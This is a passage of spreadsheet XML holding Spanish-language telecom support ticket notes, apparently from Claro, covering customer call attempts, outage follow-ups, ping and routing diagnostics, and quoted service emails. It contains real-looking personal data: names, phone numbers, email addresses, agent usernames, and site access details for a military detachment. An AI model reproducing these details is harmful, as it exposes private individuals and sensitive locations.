OSCAR TECUM
P:  502 22293600 EXT. 3634
M:  502-59170658
OTECUM@OCCIDENTE.COM.GT
IRAD DE LEON
P:  502 22293600 EXT 3603
M:  502 55019507
IDELEON@OCCIDENTE.COM.GT
SU APOYO PARA VERIFICAR SU UM Y BACKBONE.
SALUDOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR TECUM AL 22293600 - 59170658 INDICA QUE PARA REALIZAR PRUEBAS HAY QUE PROGRAMAR LA VISITA PORQUE EL NO SE ENCUENTRA EN EL DATA CENTER PERO QUE PROGRAMARA A ALGUIEN PARA QUE PUEDA IR A REALIZAR LAS PRUEBAS Y SE ESTARA COMUNICANDO CON NOSOTROS**
-ID 1001995880 - 1001995497
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LOS CONTACTOS  502 22293600 NO RESPONDE || SE INTENTARA LUEGO**
-ID 001504123
**</t>
  </si>
  <si>
    <t>F4615062</t>
  </si>
  <si>
    <t>ENLACE CONTINUA CAIDO, SE REALIZAN PRUEBAS CAMBIANDO NEGOCIACIONES EN EL PUERTO #4 DEL CTC REMOTO, SE VALIDA VLAN CREADA EN CTC REMOTO, CTC LOCAL Y SLOT 1, SIN EMBARGO NO REPORTA MAC ADDRESS DEL CPE EN LA REPISA CTC, POR LO QUE ES NECESARIO REINICIAR EQUIPO, SE PROCEDE A ENVIAR CORREO A CLIENTE NUEVAMENTE
&lt;JTPAGTJUN1C1A04A02EIM1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.71.44
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.174.71.44/32  DIRECT  0    0                 0.0.0.0         VLANIF3750
&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.71.44
  PING 10.174.71.44: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.174.71.44 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE DE INTERNET ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_CREDOMATIC_GT_INTERNET_AGENCIA_0095, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR YA QUE ES NECESARIO REALIZAR PRUEBAS DE PRIMER NIVEL CON LOS EQUIPOS. QUEDO ATENTO A SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4615064</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS SOLIS/DANIEL MOLINA 77773094 PARA INFORMARLE ACERCA DE LAS PRUEBAS, PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
F4615064 / GDN 22509200 /YSKL LA ROMANTICA S.A./ SAN SALVADORCOL. FLOR BLANCAAVENIDA OLIMPICANO 192Y 65 AV.SUR
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADOS,
REFERENTE AL REPORTE REALIZADO PARA LA REVISIÓN DEL SERVICIO DE E1 CON EL GDN 22509200, LE COMENTAMOS QUE ACTUALMENTE EL SERVICIO SE ENCUENTRA OPERATIVO A NIVEL DE CENTRAL, SE COLOCO TRAZADO Y SE REALIZARON LLAMADAS DE PRUEBA, EN DONDE SE OBSERVA QUE DA TONO DE OCUPADO Y ADICIONAL LIBERACIÓN DE LA LLAMADA DE PARTE DE LA PBX.
POR LO QUE SOLICITAMOS DE SU AMABLE APOYO CON REALIZAR EL REINICIO DE LA PBX PARA CONFIRMAR QUE NO ESTUVIERA INHIBIDA O BLOQUEADA Y REALIZAR PRUEBAS NUEVAMENTE, EN DADO CASO NO FUNCIONE NUEVAMENTE EL SERVICIO, FAVOR VERIFICAR CON EL PROVEEDOR.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>SE CONTACTA CON DANIEL MOLINA 74659114 PERO TAMPOCO RESPONDE DESPUES DE VARIOS INTENTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CARLOS SOLIS  77773094 PERO NO NOS CONTESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN YA COMPLETA LA LLAMADA, NOS ATIENDE YENNI QUIEN CONFIRMA LLAMADAS EN AMBOS SENTIDOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS SOLIS 77773094 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001046751</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN DA TONO DE OCUPADO
##LALMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4615109</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN JURACAN 41498782 MENCIONA QUE ACTUALMENTE ESTA FUNCIONANDO CORRECTAMENTE
MENCIONA QUE YA ESCALARON EL CASO CON SU EJECUTIVO PORQUE EL INCONVENIENTE ES MUY RECURRENTE
CLIENTE MENCIONA QUE EL DIA DE HOY TIENE REUNION CON SU EJECUTIVO PARA VERIFICAR EL INCONVENIENTE YA QUE ES RECURRENTE
SE LE MENCIONA A CLIENTE QUE EL SERVICIO A NIVEL DE CLARO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE SOLICITA LLAMAA PARA LAS 17:00 HRS
-ID 2001011869</t>
  </si>
  <si>
    <t>F4615113</t>
  </si>
  <si>
    <t>F4615136</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS IRAETA 75747554 MENCIONA QUE YA TODO ESTA FUNCIONAMIENTO CORRECTAMENTE
-ID 2001002248</t>
  </si>
  <si>
    <t>F4615138</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE CON PRUEBAS.
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, LE INFORMAMOS QUE OBSERVAMOS EL SERVICIO OPERATIVO Y ESTABLE, ADICIONAL ADJUNTO LOS PARÁMETROS DE FIBRA ÓPTICA, LOS CUALES SE OBSERVAN DE FORMA CORRECTA
PARÁMETROS DE FIBRA ÓPTICA
 *. TX OPTICAL POWER                        (-10.0 DBM)
 *. RX OPTICAL POWER                        (-12.3 DBM)
PING VRF INTERNET_NI_METRO 190.212.138.70 COUNT 1500 SI 1400
FRI JUN 24 08:13:35.441 GMT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 1400-BYTE ICMP ECHOS TO 190.212.138.70, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 1/1/72 MS
SALUDOS
.</t>
  </si>
  <si>
    <t>F4615139</t>
  </si>
  <si>
    <t>SERVICIO SE OBSERVA ACTIVO- A SOLICITUD DE CLIENTE SE VALIDARA DIA MIERCOLES##
ORT STATUS                                	= NORMAL
DEVICE NAME                                	= M04_LTECSVYE_E1_SANTA_TECLA_04
NAME                                       	= FRAME:0/SLOT:0/PORT:7
ALIAS                                      	= UNEX_SA_DE_CV
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HORACIO RODRIGUEZ 70699968 MENCIONA QUE YA NO VOLVIO A PRESENTAR NINGUN PROBLEMA
CLIENTE CONFIRMA EL FUNCIONAMIENTO
-ID 2001997436</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HORACIO RODRIGUEZ-70699968 ### NO SE OBSERVAN ERRORES ENE L SERVICIO ###  GRAFICA A CERO ## CLIENTE NO CONTESTA ## ENVIA A BUZON ##
2001949308
COLA:
NOMBRE: A: 0050370699968
NÚMERO: 0050370699968
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050370699968
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 12:28:06
2001949135
COLA:
NOMBRE: A: 0050370699968
NÚMERO: 0050370699968
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370699968
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 12:28:11</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HORACIO RODRIGUEZ-70699968   ##ENVIA DIRECTO A BUZON ### EN GRAFICA NO SE OBSERVAN ERRORES. GRAFICA SE ADJUNTA A TICKET.
2001916780
COLA:
NOMBRE: A: 0050370699968
NÚMERO: 0050370699968
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 0050370699968
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 10:47:42
2001916842
COLA:
NOMBRE: A: 0050370699968
NÚMERO: 0050370699968
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 0050370699968
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 10:47:59</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE, INDICA QUE NO SE LE HA CAIDO EL SERVICIO PERO QUE EN ESTOS DIAS LE ENTRARON UN PAR DE LLAMADAS EN EL CUAL- NO SE ESCUCHA A LA PERSONA Y SOLO SE PERCIBE UN POCO DE RUIDO.   ##CLIENTE REALIZARA PRUEBAS##PIDE SE LE MARQUE EN 2 HORAS + SE CORREN PRUEBAS DE CALIDAD##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HORACIO RODRIGUEZ-70699968 NO RESPONDE, ENVIA A BUZON
-ID 2001915478</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HORACIO RODRIGUEZ-70699968  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HORACIO RODRIGUEZ 70699968 - 78522864PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001872234 - 2001872336</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HORACIO RODRIGUEZ-70699968 CLIENTE INDICA QUE SI ESTA ESTABLE PERO DESEA QUE NO SE CIERRE EL TICKET QUE SE DEJE ABIERTO HASTA EL DIA MIERCOLES PARA VER QUE TAL LE FUNCIONA**
-ID 2001051765
**</t>
  </si>
  <si>
    <t>SE LLLAME A CEITNE  HORACIO RODRIGUEZ-70699968 SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4615157</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL RAMIREZ AL 71406428  INDICA QUE ESTA INESTABLE QUE SE CONECTA Y SE DESCONECTA Y SIN ACCESO A INTERNET || SE NOTIFICA A GESTOR **
-ID 2001016730
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL RAMIREZ 71406428 RESPONDE ALEXIS MENCIONA QUE EL INCONVENIENTE PERSISTE
SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA OPERATIVO Y ESTABLE
CLIENTE SOLICITA SE PUEDA ENVIAR PRUEBAS POR CORREO BODEGA.COMCELL@GMAIL.COM
-ID 2001026568</t>
  </si>
  <si>
    <t>F4615159</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 76091345 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001030443</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS FUNEZ 76091345 MENCIONA QUE PERSISTE EL PROBLEMA
SE LE INDICA A CLIENTE QUE A NIVEL DE CLARO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE INSISTE Y SOLICITA VISITA TECNICA
-ID 2001121499
NOMBRE DEL CLIENTE: MINISTERIO DE DEFENSA CETAC				
UBICACIÓN:DESTACAMENTO MILITAR #3 KILOTRO 195 CARRETERA A SAN MIGUEL, CONCHAGUA LA UNION
CONTACTO EN SITIO:ENCARGADO
HORARIO DE ATENCION:8:00 - 16:00 - SABADO TRABAJAN
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS FUNEZ 70001261 NO SE LOGRA COMUNICACION, ID. 2001008083.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS FUNEZ 70655316 NO CONTESTO IVR ENVIA A BUZON, ID: 2001007780.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS FUNEZ AL 76091345 RESPONDE EL SEÑOR  CECILIO LOPEZ INDICA QUE NO ESTA EN SITIO QUE SE LE LLAME A LAS 14:00 HRS **
-ID 2001030443
**</t>
  </si>
  <si>
    <t>F4615174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RITA ORTIZ 56946908 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001007001</t>
  </si>
  <si>
    <t>F4615188</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORAN 75890629 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001040449</t>
  </si>
  <si>
    <t>F4615191</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FERNANDO ASTEGUITA 56338357  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001129555</t>
  </si>
  <si>
    <t>F4615192</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NICOLAS  AL 55816403 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE LE LLAME A LAS 16:00 HRS PARA CONFIRMAR YA QUE HA TENIDO INESTABILIDAD QUE CADA 15 MIN TENIA CAIDAS**
-ID 2001033501
**</t>
  </si>
  <si>
    <t>F4615198</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS SOSA 55172816 NO CONTESTO, SE NECESITA VALIDAR SI ESTE ATM CUENTA CON ENERGIA ELECTRICA.,</t>
  </si>
  <si>
    <t>F4615199</t>
  </si>
  <si>
    <t>SE VALIDA LA DIRECCION DE CLIENTE   30 AVENIDA 9-90 ZONA 12 PAMPLONA</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, SE ENVIAN DNS DE CLARO PARA VERIFICAR SI EL INCONVENIENTE PERSISTE SOBRE LA LATENCIA
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 19:57
PARA: GABRIEL RODRÍGUEZ &lt;GRODRIGUEZ@HELADOSARITA.COM&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;;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
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EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN CARLOS AILON &lt;JCAILON@HELADOSARITA.COM&gt;; JUAN CARLOS MARTINEZ &lt;ADMRIDTIOFCGT@HELADOSARITA.COM&gt;
ASUNTO: RE: ENLACE CLARO - DISAR (SARITA)
BUENA NOCHE
ESTIMADOS CLIENTE  REALIZANDO LAS PRUEBAS CORRESPONDIENTES SE VERIFICO A NIVEL DE CLARO QUE NO SE CUENTAN CON TIEMPOS ALTOS, SOLICITAMOS DE SU APOYO EN VALIDAR LOS DNS  QUE TIENEN COLOCADOS EN LOS HOST, ADJUNTO LOS DNS DE CLARO
DNS DE CLARO
190.184.56.72
186.151.242.124
216.230.147.90
216.230.139.9
216.230.139.8
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE INDICANDO LA VISITA SE REALIZARA A LAS 13 30  PARA PODER REALIZAR LAS PRUEBAS###
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 11:53
PARA: GABRIEL RODRÍGUEZ &lt;GRODRIGUEZ@HELADOSARITA.COM&gt;;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
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EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN CARLOS AILON &lt;JCAILON@HELADOSARITA.COM&gt;; JUAN CARLOS MARTINEZ &lt;ADMRIDTIOFCGT@HELADOSARITA.COM&gt;
ASUNTO: RE: ENLACE CLARO - DISAR (SARITA)
ESTIMADOS.
ENTONCES SE PROGRAMA VISITA A LAS 13:30 PM PARA PODER REALIZAR LAS PRUEBAS CORRESPONDIENTES.
SALUDOS</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE COMUNICANDO LOS TECNICOS##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 11:25
PARA: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
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GABRIEL RODRÍGUEZ &lt;GRODRIGUEZ@HELADOSARITA.COM&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN CARLOS AILON &lt;JCAILON@HELADOSARITA.COM&gt;; JUAN CARLOS MARTINEZ &lt;ADMRIDTIOFCGT@HELADOSARITA.COM&gt;
ASUNTO: RE: ENLACE CLARO - DISAR (SARITA)
MUY BUEN DÍA ESTIMADOS.
SE MANDA EL LISTADO DE LOS POSIBLES TÉCNICOS QUE REALIZARAN LA VISITA PARA EL DÍA DE HOY 24/06/2022 A LAS 15:00 PM.
LISTADO DE PERSONAL
MARLON ENRIQUE MUÑOZ ORELLANA          652515       1582 46500 1801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SALUDOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MARTÍNEZ  58588670 MENCIONA QUE SI NECESITA LA VISITA PARA HOY ANTES DE LAS 15:00 HRS
CLIENTE MENCIONA QUE ESTARA EN PR PARA REALIZAR LAS PRUEBAS CON PERSONAL TECNICO
CONTACTO EN SITIO: JUAN CARLOS MARTÍNEZ  58588670
-ID 2001063269</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS MARTINEZ COMENTA SE LE COMENTA QUE NECESITAMOS DEJARLO SIN SERVICIO UNOS MOMENTOS PARA REALIZAR PRUEBAS EN EL NODO, PERO COMENTA QUE EL DIA DE HOY NO ES POSIBLE, YA QUE ESTAN EL PRODUCCCION, SOLICITA QUE SE PUEDA ENVIAR CORREO Y REALIZAR PRUEBAS EL DIA DE MAÑANA POR LA MAÑANA
2001240795
COLA:
NOMBRE: A: 58588670
NÚMERO: 58588670
DURACIÓN: 0:02:17
ESTADO: CONECTADA
DETALLES: 58588670
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 25/06/2022 10:52:16</t>
  </si>
  <si>
    <t>SE LLAMA A CAROLINA EJECTUVIA DE CUENTAN DE CLIENTE , SE SOLICITA ID DE LOS SERVICIO CONTRATADOS POR EL CLIENTE, SE ESTA VALIDANDO
[8:36] JUAN CARLOS LOPEZ SANCHEZ
2001208468
COLA:
NOMBRE: A: 58263283
NÚMERO: 58263283
DURACIÓN: 0:11:14
ESTADO: CONECTADA
DETALLES: 58263283
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 25/06/2022 08:36:07</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, ES NECESARIO REALIZAR PRUEBAS EN EL NODO POR LO QUE SE SOLICITO A CLIENTE BOTAR EL SERVICIO POR 2 HORAS APROXIMADAMENTE
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 25 DE JUNIO DE 2022 11:16
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GABRIEL RODRÍGUEZ &lt;GRODRIGUEZ@HELADOSARITA.COM&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; BYRON ESCOBAR &lt;SOPORTE@HELADOSARITA.COM&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GUSTAVO ADOLFO GUERRA MORAN &lt;GUSTAVO.GUERRA@CLARO.COM.GT&gt;; CAROLINA MEJIA ELIAS &lt;CAROLINA.MEJIA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: CARLOS MIGUEL MENCHÚ &lt;LIDERFUNCIONAL2@HELADOSARITA.COM&gt;; SANDRA VICTORIA FUENTES BOBADILLA &lt;SANDRAV.FUENTES@CLARO.COM.GT&gt;; EDDY FRANCISCO MONTUFAR ELIAS &lt;EDDY.MONTUFAR@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; ASTRID ILEANA HERNANDEZ SOSA &lt;ASTRID.HERNANDEZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JUAN CARLOS AILON &lt;JCAILON@HELADOSARITA.COM&gt;; JUAN CARLOS MARTINEZ &lt;ADMRIDTIOFCGT@HELADOSARITA.COM&gt;
ASUNTO: RE: ENLACE CLARO - DISAR (SARITA)
BUEN DÍA
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO Y DE ACUERDO A LO CONVERSADO VÍA TELEFÓNICA CON JUAN CARLOS MARTÍNEZ , LE COMENTAMOS QUE SE ESTARÁN REALIZANDO PRUEBAS EN LOS EQUIPOS DE CLARO, POR LO QUE EL DÍA DE MAÑANA POR LA MAÑANA SE LES ESTARÁ CORTANDO EL SERVICIO, POR UN LAPSO DE DOS HORAS DE 9:00 AM YA 11:00 AM, SOLICITAMOS DE SU APOYO EN CONFIRMAR SI ES POSIBLE ESTE HORARIO O BRINDAR UN HORARIO EN DONDE NO PUEDA AFECTAR SU PRODUCCIÓN.
QUEDAMOS ATENTOS A SU CONFIRMACIÓN
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4615208</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YURI ANABEL PLEITEZ 95614721 PARA SOLICITAR DATOS DE VISITA
-ID 2001035163
NOMBRE DEL CLIENTE: REGISTRO NACIONAL DE LAS PERSONAS -
UBICACIÓN:1 CUADRA ABAJO DEL CENTRO DE SALUD TRAS CERROS NUEVA FRONTERA SANTA BARBARA
CONTACTO EN SITIO: ANABEL PLEITEZ 95614721
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4615210</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE DEBE VALIDAR SERVICIO HASTA EL DÍA LUNES A LAS 08:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4615229</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  30727797 RESONDE MARLON NAVAS  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001155968</t>
  </si>
  <si>
    <t>F4615232</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 PARA BRINDAR RETROALIMENTACION
-ID 2001093615</t>
  </si>
  <si>
    <t>F4615239</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ALEXANDER - 73542623 INDICA QUE AUN TIENE PROBLEMAS DE SEÑAL O PROBLEMA QUE SE SATURA CUANDO HAY MUCHO MOVIMIENTO CON EL PROGRAMA QUE MANEJAN PARA SUS ORDENES || SE NOTIFICA A GESTOR YA QUE CL SOLICITA UNA VISITA PARA QUE SE LE DE UNA ASESORIA DE QUE PUEDEN HACER EN ESE CASO **
-ID 2001122002
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEXANDER - 73542623 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001096970</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLARA DEL CARMEN 75811478 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR ALEXANDER - 73542623
-ID 2001096491</t>
  </si>
  <si>
    <t>F4615240</t>
  </si>
  <si>
    <t>SE LLAMO LA NUMERO DEL GDN Y LA LLAMADA COMPLETA.
INGRESA EL IVR.
2001123331
COLA:
NOMBRE: A: 24100300
NÚMERO: 24100300
DURACIÓN: 0:00:14
ESTADO: CONECTADA
DETALLES: 24100300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 14:24:24</t>
  </si>
  <si>
